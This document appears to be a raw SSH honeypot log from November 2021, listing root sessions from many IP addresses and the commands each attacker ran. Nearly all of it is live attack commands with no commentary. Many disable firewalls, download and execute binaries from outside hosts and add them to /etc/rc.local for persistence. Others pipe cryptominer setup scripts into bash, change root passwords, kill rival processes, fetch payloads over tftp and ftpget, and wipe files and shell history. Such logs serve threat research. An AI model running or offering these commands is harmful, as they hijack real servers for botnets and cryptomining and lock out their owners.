Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudo;chmod 777 sudo;./sudo;echo "cd /tmp/">>/etc/rc.local;echo "./sudo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudo
chmod 777 sudo
./sudo
echo "cd /tmp/">>/etc/rc.local
echo "./sudo
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 212.193.30.209 18-Nov-2021 23:19:41 ssh2 root
ls
pwd
last
w
uptime
ls /var/log
top

From 107.189.10.234 19-Nov-2021 01:07:27 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://107.189.10.234:8009/Linux4.7;chmod 777 Linux4.7;./Linux4.7;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://107.189.10.234:8009/Linux4.7
chmod 777 Linux4.7
./Linux4.7

From 222.186.133.160 19-Nov-2021 04:45:32 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudo;chmod 777 sudo;./sudo;echo "cd /tmp/">>/etc/rc.local;echo "./sudo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudo
chmod 777 sudo
./sudo
echo "cd /tmp/">>/etc/rc.local
echo "./sudo
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.160 19-Nov-2021 04:49:16 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudu5;chmod 777 sudu5;./sudu5;echo "cd /tmp/">>/etc/rc.local;echo "./sudu5&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudu5
chmod 777 sudu5
./sudu5
echo "cd /tmp/">>/etc/rc.local
echo "./sudu5
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 43.129.29.174 19-Nov-2021 15:23:04 ssh2 root
Exec echo -n rz36s859|md5sum;uname -a
echo -n rz36s859|md5sum
uname -a

From 49.235.77.153 20-Nov-2021 07:05:42 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 142.93.214.155 20-Nov-2021 19:18:56 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.105.119.145/skidnet.sh; chmod 777 *; sh skidnet.sh; tftp -g 172.105.119.145 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://172.105.119.145/skidnet.sh
chmod 777 *
sh skidnet.sh
tftp -g 172.105.119.145 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 199.19.224.231 21-Nov-2021 00:39:44 ssh2 root
Exec cat /etc/issue; wget http://185.224.129.251/x86_64; chmod 777 *; ./x86_64 x86xhed; echo Niki 6to quitna moito mom4e
cat /etc/issue
wget http://185.224.129.251/x86_64
chmod 777 *
./x86_64 x86xhed
echo Niki 6to quitna moito mom4e

From 194.85.248.46 21-Nov-2021 15:19:30 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s;wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s
wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s

From 209.141.47.245 21-Nov-2021 18:39:54 ssh2 root
Exec cat /etc/issue; wget http://185.224.129.251/x86_64; chmod 777 *; ./x86_64 x86xhed; echo Niki 6to quitna moito mom4e
cat /etc/issue
wget http://185.224.129.251/x86_64
chmod 777 *
./x86_64 x86xhed
echo Niki 6to quitna moito mom4e

From 101.34.66.244 21-Nov-2021 21:47:20 ssh2 root
Exec curl -s -L http://42.193.169.139:280/xmr.sh | bash -s
curl -s -L http://42.193.169.139:280/xmr.sh | bash -s
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 61.216.129.217 21-Nov-2021 23:21:50 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 45.64.134.113 21-Nov-2021 23:27:21 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 101.34.66.244 21-Nov-2021 23:27:48 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 193.8.4.40 21-Nov-2021 23:31:37 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 193.8.4.40 21-Nov-2021 23:31:43 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 101.34.66.244 21-Nov-2021 23:33:07 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 193.8.4.44 21-Nov-2021 23:36:10 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 76.125.91.27 21-Nov-2021 23:36:20 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 193.8.4.40 21-Nov-2021 23:37:09 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 185.212.129.247 21-Nov-2021 23:37:16 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 193.8.4.40 21-Nov-2021 23:37:31 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 193.8.4.40 21-Nov-2021 23:37:37 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 101.34.66.244 21-Nov-2021 23:37:52 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 201.184.37.15 21-Nov-2021 23:38:06 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 114.64.231.213 21-Nov-2021 23:38:54 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 101.34.66.244 21-Nov-2021 23:39:39 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 114.64.231.213 21-Nov-2021 23:39:42 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 114.64.231.213 21-Nov-2021 23:40:28 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 101.34.66.244 21-Nov-2021 23:40:31 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 193.8.4.40 21-Nov-2021 23:40:51 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 194.67.78.218 21-Nov-2021 23:48:01 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 83.56.9.96 22-Nov-2021 00:26:36 ssh2 root
ps faux

From 83.56.9.96 22-Nov-2021 00:26:45 ssh2 root
uname -a
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 159.75.242.214 22-Nov-2021 00:26:47 ssh2 root
ls -lha

From 193.198.163.108 22-Nov-2021 00:27:06 ssh2 root
catoc/cpuinfo
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 119.29.141.189 22-Nov-2021 00:27:11 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
cat /proc/cpuinfo

From 110.42.198.251 22-Nov-2021 00:27:23 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
free -h

From 2.197.115.147 22-Nov-2021 00:27:39 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 157.245.107.84 22-Nov-2021 00:27:40 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 94.250.255.85 22-Nov-2021 00:31:51 ssh2 root
logout
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 83.56.9.96 22-Nov-2021 00:33:55 ssh2 root
htop

From 110.42.198.251 22-Nov-2021 00:34:06 ssh2 root
uptime

From 83.56.9.96 22-Nov-2021 00:34:11 ssh2 root
uptime
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 2.197.115.147 22-Nov-2021 00:34:16 ssh2 root
whoami

From 110.42.198.251 22-Nov-2021 00:34:24 ssh2 root
cat .bashrc

From 159.75.242.214 22-Nov-2021 00:34:25 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
ls -lh

From 146.56.222.230 22-Nov-2021 00:34:31 ssh2 root
cat /etc/issue

From 110.42.198.251 22-Nov-2021 00:34:37 ssh2 root
touch asdfasdfasdfasdfasdf
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 110.42.198.251 22-Nov-2021 00:34:42 ssh2 root
echo fffff
echo $??

From 157.245.107.84 22-Nov-2021 00:34:46 ssh2 root
echo $?

From 110.42.198.251 22-Nov-2021 00:34:47 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig


From 110.42.198.251 22-Nov-2021 00:34:51 ssh2 root
exit

From 34.136.179.229 22-Nov-2021 00:43:10 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
exit

From 110.42.198.251 22-Nov-2021 00:44:29 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 178.138.96.160 22-Nov-2021 00:53:58 ssh2 root
fuck you
exit

From 152.136.149.104 22-Nov-2021 01:16:35 ssh2 root
Exec curl -s -L http://152.136.149.104:280/xmr.sh | bash -s
curl -s -L http://152.136.149.104:280/xmr.sh | bash -s

From 222.186.133.167 22-Nov-2021 02:07:20 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/bmw;chmod 777 bmw;./bmw;echo "cd /tmp/">>/etc/rc.local;echo "./bmw&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/bmw
chmod 777 bmw
./bmw
echo "cd /tmp/">>/etc/rc.local
echo "./bmw
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/bmw;chmod 777 bmw;./bmw;echo "cd /tmp/">>/etc/rc.local;echo "./bmw&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/bmw
chmod 777 bmw
./bmw
echo "cd /tmp/">>/etc/rc.local
echo "./bmw
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.160 22-Nov-2021 02:37:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/bmw;chmod 777 bmw;./bmw;echo "cd /tmp/">>/etc/rc.local;echo "./bmw&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/bmw
chmod 777 bmw
./bmw
echo "cd /tmp/">>/etc/rc.local
echo "./bmw
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 167.71.12.34 22-Nov-2021 22:32:33 ssh2 root
Exec echo root:tsturi123|chpasswd|bash; pkill java; pkill ntpd; pkill screen; pkill Xorg; pkill koel; pkill x86; pkill cnrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo root:tsturi123|chpasswd|bash
pkill java
pkill ntpd
pkill screen
pkill Xorg
pkill koel
pkill x86
pkill cnrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 20.195.196.210 23-Nov-2021 04:03:25 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 194.163.165.136 23-Nov-2021 05:02:28 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 141.98.10.179 23-Nov-2021 14:38:47 ssh2 root
Exec echo `hostname`;echo -e `hostname`n`hostname` | passwd; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo `hostname`
echo -e `hostname`n`hostname` | passwd
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 141.98.10.246 24-Nov-2021 03:40:07 ssh2 root
Exec echo `hostname`;echo -e `hostname`n`hostname` | passwd; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo `hostname`
echo -e `hostname`n`hostname` | passwd
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 141.98.10.246 24-Nov-2021 04:42:44 ssh2 root
Exec echo `hostname`;echo -e `hostname`n`hostname` | passwd; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo `hostname`
echo -e `hostname`n`hostname` | passwd
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 178.62.85.214 24-Nov-2021 04:48:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.101.56.195/76d32be0.sh; curl -O http://46.101.56.195/76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp 46.101.56.195 -c get 76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp -r 76d32be02.sh -g 46.101.56.195; chmod 777 76d32be02.sh; sh 76d32be02.sh; ftpget -v -u anonymous -p anonymous -P 21 46.101.56.195 76d32be01.sh 76d32be01.sh; sh 76d32be01.sh; rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh; rm -rf * 
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://46.101.56.195/76d32be0.sh
curl -O http://46.101.56.195/76d32be0.sh
chmod 777 76d32be0.sh
sh 76d32be0.sh
tftp 46.101.56.195 -c get 76d32be0.sh
chmod 777 76d32be0.sh
sh 76d32be0.sh
tftp -r 76d32be02.sh -g 46.101.56.195
chmod 777 76d32be02.sh
sh 76d32be02.sh
ftpget -v -u anonymous -p anonymous -P 21 46.101.56.195 76d32be01.sh 76d32be01.sh
sh 76d32be01.sh
rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh
rm -rf *

From 209.141.32.141 24-Nov-2021 21:33:35 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
sudo hive-passwd cummingonthecumrightinfrontofthecumwhichiscummingonthecummyfloor
sudo pkill Xorg
sudo pkill x11vnc
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 209.141.32.141 25-Nov-2021 10:24:49 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
sudo hive-passwd cummingonthecumrightinfrontofthecumwhichiscummingonthecummyfloor
sudo pkill Xorg
sudo pkill x11vnc
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 167.71.12.34 25-Nov-2021 11:16:53 ssh2 root
Exec echo root:tstur2i123|chpasswd|bash; pkill java; pkill ntpd; pkill screen; pkill Xorg; pkill koel; pkill x86; pkill cnrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo root:tstur2i123|chpasswd|bash
pkill java
pkill ntpd
pkill screen
pkill Xorg
pkill koel
pkill x86
pkill cnrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 42.193.169.139 25-Nov-2021 15:02:37 ssh2 root
Exec curl -s -L http://42.193.169.139:280/xmr.sh | bash -s
curl -s -L http://42.193.169.139:280/xmr.sh | bash -s

From 188.166.19.170 26-Nov-2021 02:02:36 ssh2 root
Exec sudo hive-passwd presidenthiveassos123; sudo pkill Xorg
sudo hive-passwd presidenthiveassos123
sudo pkill Xorg

From 20.206.109.196 26-Nov-2021 08:32:38 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 38.91.102.73 26-Nov-2021 20:25:09 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 107.189.10.234 28-Nov-2021 05:08:48 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://107.189.12.187/bins/sevensu.sh;chmod 777 sevensu.sh;./sevensu.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://107.189.12.187/bins/sevensu.sh
chmod 777 sevensu.sh
./sevensu.sh

From 137.220.194.92 28-Nov-2021 12:25:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://137.220.194.14:9090/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://137.220.194.14:9090/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 20.206.86.43 28-Nov-2021 14:23:05 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';nproc;curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
nproc
curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | LC_ALL=en_US.UTF-8 bash -s

